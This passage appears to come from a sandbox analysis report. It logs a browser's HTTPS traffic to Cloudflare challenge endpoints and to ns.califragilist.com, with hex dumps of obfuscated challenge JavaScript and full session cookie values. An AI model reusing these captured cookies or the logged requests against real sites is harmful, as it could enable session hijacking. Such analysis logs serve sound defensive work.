                                                                                                                                              2024-11-06 15:55:36 UTC1369INData Raw: 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 6a 75 28 33 39 32 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 6a 76 2c 69 2c 6a 29 7b 72 65 74 75 72 6e 20 6a 76 3d 6a 75 2c 69 3d 7b 7d 2c 69 5b 6a 76 28 31 33 30 32 29 5d 3d 6a 76 28 39 31 34 29 2c 6a 3d 69 2c 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 6b 2c 6a 77 29 7b 72 65 74 75 72 6e 20 6a 77 3d 6a 76 2c 6a 5b 6a 77 28 31 33 30 32 29 5d 5b 6a 77 28 37 33 33 29 5d 28 6b 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 6a 78 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4f 29 7b 69 66 28 6a 78 3d 6a 75 2c 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72
                                                                                                                                              Data Ascii: n(h,i){return h-i}},e=String[ju(392)],f={'h':function(h,jv,i,j){return jv=ju,i={},i[jv(1302)]=jv(914),j=i,h==null?'':f.g(h,6,function(k,jw){return jw=jv,j[jw(1302)][jw(733)](k)})},'g':function(i,j,o,jx,s,x,B,C,D,E,F,G,H,I,J,K,L,M,O){if(jx=ju,i==null)retur
                                                                                                                                              2024-11-06 15:55:37 UTC1369INData Raw: 31 38 29 5d 3d 30 2c 4f 5b 6a 78 28 31 32 32 38 29 5d 3d 30 2c 4f 5b 6a 78 28 31 30 32 38 29 5d 3d 30 2c 4f 5b 6a 78 28 34 33 33 29 5d 3d 30 2c 4a 5b 6a 78 28 31 36 31 39 29 5d 3d 4f 2c 6f 28 29 2c 4b 5b 6a 78 28 39 30 34 29 5d 5b 6a 78 28 38 33 30 29 5d 3d 44 5b 6a 78 28 36 37 39 29 5d 28 29 3b 69 66 28 43 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 6a 78 28 31 33 39 38 29 5d 5b 6a 78 28 35 37 36 29 5d 5b 6a 78 28 35 37 33 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 6a 78 28 31 34 31 34 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 6a 78 28 37 35 36 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 6a 78 28 31 31 32 39 29 5d 28 64 5b 6a 78 28 31 36 30 33 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49
                                                                                                                                              Data Ascii: 18)]=0,O[jx(1228)]=0,O[jx(1028)]=0,O[jx(433)]=0,J[jx(1619)]=O,o(),K[jx(904)][jx(830)]=D[jx(679)]();if(C!==''){if(Object[jx(1398)][jx(576)][jx(573)](B,C)){if(256>C[jx(1414)](0)){for(s=0;d[jx(756)](s,F);H<<=1,I==j-1?(I=0,G[jx(1129)](d[jx(1603)](o,H)),H=0):I


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              33192.168.2.1849783104.18.94.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:36 UTC742OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:37 UTC240INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:37 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 61
                                                                                                                                              Connection: close
                                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644d43ac70b76-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:37 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              34192.168.2.1849773188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:37 UTC1324OUTGET /favicon.ico HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjhqSENYMSt1OXdLOXRZbGJzV1FqL3c9PSIsInZhbHVlIjoiaHk0N05sMlNZK1IySDVXRFdhVkZkRTczQjB6ZUU5bktEaE9mZDhNVHlNRlNMMk1ZdXgzOXZWOUQ1SU5OdW9xTlZ1ejA5bmhnMTlTVThINHp2b2xNL1ZIandRTFV1WEJWYkpEUndjOHQzcldKUXNLcGdPaDhxOUxrRVc3alRPcmQiLCJtYWMiOiI0YmQwNjlkNDY4OWI0MjIwYjVhMjI0Njc2MTZlNWE0NjkxZDExNTU0Mzk0ODc5MTlhZmNmNWQ5ZjAwY2Q5ZDBiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNPSmpMUGFpZzFkNnBoVDBJUER3OEE9PSIsInZhbHVlIjoiZW1nWGs4NWtOZG9oUm9vTC83bEx4eVFkaFZwZDdIQU1icGV1WTJvaHFtb2dQZWp5eWZWTHRrZ2dEQ2d4akl5Ny9nNlMyWHJsNW9WcmlEbUw0bXdPdE5DLzNNdnlLWmtyRkVSODE3UlBXdWE2cGZxYWRGWlhCMytqMStNSGx5Mi8iLCJtYWMiOiIyNzg5MTIxNTIwMWMxZDJhZWY3YTg0ODlhNWZkODdlYjIwMDdmOGNjMDA0NDBkNGYzYmZmM2M2NDExM2Y5ZjZmIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:37 UTC1002INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:37 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w1RxPFelQCu0PdU74vtLhs%2FDGY48xdLJUX2eveSxk9zIslKi6XvmNzk5ALlpPKZJlZvYV2Ls86JP3a0woJTzolxDT2PRV0FB5rCU6hgUqDYoeClPh3ZuW5lP9Kocsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3254&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2245&delivery_rate=878374&cwnd=243&unsent_bytes=0&cid=886ef739cb31a901&ts=194&x=0"
                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644d6f8b4e759-DEN
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19080&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1902&delivery_rate=151781&cwnd=32&unsent_bytes=0&cid=9118dc92d1985769&ts=5067&x=0"
                                                                                                                                              2024-11-06 15:55:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              35192.168.2.1849784104.18.95.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:37 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:37 UTC240INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:37 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 61
                                                                                                                                              Connection: close
                                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644d92fa12e1b-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:37 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              36192.168.2.1849785104.18.95.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:37 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8de644ce9b5745f6&lang=auto HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:38 UTC331INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:38 GMT
                                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                                              Content-Length: 121058
                                                                                                                                              Connection: close
                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644daa80f3ab2-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:38 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 48 50 55 62 6a 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.HPUbj2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75
                                                                                                                                              Data Ascii: %20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-su
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 28 31 32 31 36 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 35 32 35 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 36 39 29 29 2f 38 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 35 35 33 29 29 2f 39 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 35 39 31 29 29 2f 31 30 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 37 35 39 34 30 36 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 35 30 34 29 5d 2c 65 4d 5b 67 4c 28 31 39 35 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 4d 2c 64 2c 65 2c 66 2c 67 29 7b 67 4d 3d 67 4c 2c 64 3d 7b 7d 2c 64 5b 67 4d 28 31 33 30 33 29 5d
                                                                                                                                              Data Ascii: (1216))/6*(parseInt(gK(525))/7)+parseInt(gK(1369))/8+parseInt(gK(1553))/9+parseInt(gK(1591))/10,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,759406),eM=this||self,eN=eM[gL(504)],eM[gL(1958)]=function(gM,d,e,f,g){gM=gL,d={},d[gM(1303)]
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 69 5b 67 4f 28 31 31 30 35 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 66 5b 67 4f 28 31 35 34 30 29 5d 5b 67 4f 28 31 31 31 37 29 5d 2c 27 66 65 65 64 62 61 63 6b 4f 72 69 67 69 6e 27 3a 67 4f 28 31 32 39 33 29 2c 27 65 76 65 6e 74 27 3a 67 4f 28 31 32 33 32 29 7d 2c 27 2a 27 29 3a 66 5b 67 4f 28 38 35 31 29 5d 3d 4a 53 4f 4e 5b 67 4f 28 31 35 33 35 29 5d 28 66 5b 67 4f 28 38 35 31 29 5d 29 2c 6b 3d 68 7c 7c 67 4f 28 38 33 31 29 2c 6c 3d 65 4d 5b 67 4f 28 31 35 34 30 29 5d 5b 67 4f 28 31 37 39 31 29 5d 3f 27 68 2f 27 2b 65 4d 5b 67 4f 28 31 35 34 30 29 5d 5b 67 4f 28 31 37 39 31 29 5d 2b 27 2f 27 3a 27 27 2c 6d 3d 69 5b 67 4f 28 31 31 39 37 29 5d 28 67 4f 28 31 34 38 37 29 2b 6c 2c 67 4f 28 31 39 36 31 29 29 2b 31 2b 69 5b 67 4f 28 31 36 35 38 29 5d 2b 65
                                                                                                                                              Data Ascii: i[gO(1105)],'widgetId':f[gO(1540)][gO(1117)],'feedbackOrigin':gO(1293),'event':gO(1232)},'*'):f[gO(851)]=JSON[gO(1535)](f[gO(851)]),k=h||gO(831),l=eM[gO(1540)][gO(1791)]?'h/'+eM[gO(1540)][gO(1791)]+'/':'',m=i[gO(1197)](gO(1487)+l,gO(1961))+1+i[gO(1658)]+e
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 74 28 6e 5b 33 5d 2c 31 30 29 29 29 3a 68 3d 4a 53 4f 4e 5b 67 50 28 31 35 33 35 29 5d 28 65 29 3b 72 65 74 75 72 6e 20 6f 3d 7b 7d 2c 6f 5b 67 50 28 31 38 32 39 29 5d 3d 68 2c 6f 5b 67 50 28 35 33 31 29 5d 3d 69 2c 6f 5b 67 50 28 31 33 39 32 29 5d 3d 6a 2c 6f 5b 67 50 28 38 30 32 29 5d 3d 6b 2c 6f 5b 67 50 28 38 35 31 29 5d 3d 65 2c 6f 7d 2c 65 4d 5b 67 4c 28 38 32 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 67 52 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 67 52 3d 67 4c 2c 6a 3d 7b 7d 2c 6a 5b 67 52 28 35 30 37 29 5d 3d 67 52 28 35 30 36 29 2c 6b 3d 6a 2c 6c 3d 65 5b 67 52 28 31 35 39 35 29 5d 28 29 2c 6d 3d 67 52 28 31 31 30 30 29 2c 6c 5b 67 52 28 37 34 34 29 5d 28 6d 29 3e 2d 31 29 3f 65 4d 5b 67 52 28 31 30 33 33 29 5d 28
                                                                                                                                              Data Ascii: t(n[3],10))):h=JSON[gP(1535)](e);return o={},o[gP(1829)]=h,o[gP(531)]=i,o[gP(1392)]=j,o[gP(802)]=k,o[gP(851)]=e,o},eM[gL(824)]=function(e,f,g,h,i,gR,j,k,l,m,n,o){(gR=gL,j={},j[gR(507)]=gR(506),k=j,l=e[gR(1595)](),m=gR(1100),l[gR(744)](m)>-1)?eM[gR(1033)](
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 7d 29 2c 66 73 3d 21 5b 5d 2c 21 65 54 28 67 4c 28 31 31 33 37 29 29 26 26 28 66 54 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 6b 2c 63 2c 64 29 7b 69 6b 3d 67 4c 2c 63 3d 65 4d 5b 69 6b 28 31 35 34 30 29 5d 5b 69 6b 28 31 33 34 38 29 5d 7c 7c 31 65 34 2c 64 3d 66 52 28 29 2c 21 65 4d 5b 69 6b 28 35 34 30 29 5d 26 26 21 66 74 28 29 26 26 21 65 4d 5b 69 6b 28 31 38 34 39 29 5d 5b 69 6b 28 31 38 31 33 29 5d 26 26 64 2d 66 51 3e 63 3f 66 39 28 29 3a 66 61 28 29 7d 2c 31 65 33 29 29 2c 66 55 3d 7b 7d 2c 66 55 5b 67 4c 28 31 38 31 33 29 5d 3d 21 5b 5d 2c 66 55 5b 67 4c 28 36 35 34 29 5d 3d 65 54 2c 66 55 5b 67 4c 28 31 36 32 31 29 5d 3d 66 49 2c 66 55 5b 67 4c 28 31 34 32 34 29 5d 3d 66 4e 2c 66 55 5b 67 4c 28 31 30 36 38 29 5d
                                                                                                                                              Data Ascii: }),fs=![],!eT(gL(1137))&&(fT(),setInterval(function(ik,c,d){ik=gL,c=eM[ik(1540)][ik(1348)]||1e4,d=fR(),!eM[ik(540)]&&!ft()&&!eM[ik(1849)][ik(1813)]&&d-fQ>c?f9():fa()},1e3)),fU={},fU[gL(1813)]=![],fU[gL(654)]=eT,fU[gL(1621)]=fI,fU[gL(1424)]=fN,fU[gL(1068)]
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 2c 27 41 4f 59 70 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 75 47 56 57 7a 27 3a 69 6c 28 31 33 32 30 29 2c 27 51 57 51 54 45 27 3a 69 6c 28 31 30 35 35 29 2c 27 6f 48 67 74 45 27 3a 69 6c 28 31 38 31 38 29 2c 27 73 4f 4a 77 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 46 69 6c 4a 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 69 67 66 6a 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 79 64 57 6c 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 54 7a 75 4e 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68
                                                                                                                                              Data Ascii: ,'AOYpf':function(h,i){return h!==i},'uGVWz':il(1320),'QWQTE':il(1055),'oHgtE':il(1818),'sOJwS':function(h,i){return h>i},'FilJz':function(h,i){return h>i},'igfjR':function(h,i){return i|h},'ydWle':function(h,i){return h==i},'TzuNK':function(h,i){return h
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 2c 64 5b 69 6f 28 35 31 32 29 5d 28 69 6f 28 31 33 32 39 29 2c 69 6f 28 31 33 32 39 29 29 29 7b 69 66 28 64 5b 69 6f 28 31 33 35 33 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d 27 27 2c 45 3d 32 2c 46 3d 33 2c 47 3d 32 2c 48 3d 5b 5d 2c 49 3d 30 2c 4a 3d 30 2c 4b 3d 30 3b 4b 3c 69 5b 69 6f 28 31 32 30 32 29 5d 3b 4b 2b 3d 31 29 69 66 28 4c 3d 69 5b 69 6f 28 31 33 39 34 29 5d 28 4b 29 2c 4f 62 6a 65 63 74 5b 69 6f 28 38 38 39 29 5d 5b 69 6f 28 37 32 36 29 5d 5b 69 6f 28 35 34 33 29 5d 28 42 2c 4c 29 7c 7c 28 42 5b 4c 5d 3d 46 2b 2b 2c 43 5b 4c 5d 3d 21 30 29 2c 4d 3d 64 5b 69 6f 28 31 38 38 32 29 5d 28 44 2c 4c 29 2c 4f 62 6a 65 63 74 5b 69 6f 28 38 38 39 29 5d 5b 69 6f 28 37 32 36 29 5d 5b 69
                                                                                                                                              Data Ascii: ,d[io(512)](io(1329),io(1329))){if(d[io(1353)](null,i))return'';for(B={},C={},D='',E=2,F=3,G=2,H=[],I=0,J=0,K=0;K<i[io(1202)];K+=1)if(L=i[io(1394)](K),Object[io(889)][io(726)][io(543)](B,L)||(B[L]=F++,C[L]=!0),M=d[io(1882)](D,L),Object[io(889)][io(726)][i
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 6f 28 31 38 32 35 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 69 6f 28 35 38 32 29 5d 28 38 2c 78 29 3b 49 3d 64 5b 69 6f 28 31 32 32 39 29 5d 28 64 5b 69 6f 28 31 30 38 30 29 5d 28 49 2c 31 29 2c 64 5b 69 6f 28 31 31 32 36 29 5d 28 4e 2c 31 29 29 2c 64 5b 69 6f 28 31 34 31 38 29 5d 28 4a 2c 64 5b 69 6f 28 37 33 35 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 69 6f 28 31 33 37 31 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 69 6f 28 31 35 36 36 29 5d 28 64 5b 69 6f 28 37 30 30 29 5d 28 49 2c 31 29 2c 4e 29 2c 64 5b 69 6f 28 31 34 30 37 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 6f 28 31 33
                                                                                                                                              Data Ascii: x++);for(N=D[io(1825)](0),x=0;d[io(582)](8,x);I=d[io(1229)](d[io(1080)](I,1),d[io(1126)](N,1)),d[io(1418)](J,d[io(735)](j,1))?(J=0,H[io(1371)](o(I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;x<G;I=d[io(1566)](d[io(700)](I,1),N),d[io(1407)](J,j-1)?(J=0,H[io(13
                                                                                                                                              2024-11-06 15:55:38 UTC1369INData Raw: 6c 3f 27 27 3a 68 3d 3d 27 27 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 69 72 28 31 32 30 32 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 69 73 29 7b 72 65 74 75 72 6e 20 69 73 3d 69 72 2c 68 5b 69 73 28 31 38 32 35 29 5d 28 69 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 69 74 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4f 2c 4c 2c 4d 2c 4e 29 7b 66 6f 72 28 69 74 3d 69 6c 2c 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 6f 28 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 33 3e 45 3b 73 5b 45 5d 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 74 28 39 35 33 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 4b 21 3d 46 3b 29 66 6f 72 28 4c 3d 69 74 28
                                                                                                                                              Data Ascii: l?'':h==''?null:f.i(h[ir(1202)],32768,function(i,is){return is=ir,h[is(1825)](i)})},'i':function(i,j,o,it,s,x,B,C,D,E,F,G,H,I,J,K,O,L,M,N){for(it=il,s=[],x=4,B=4,C=3,D=[],G=o(0),H=j,I=1,E=0;3>E;s[E]=E,E+=1);for(J=0,K=Math[it(953)](2,2),F=1;K!=F;)for(L=it(


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              37192.168.2.1849786104.18.94.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
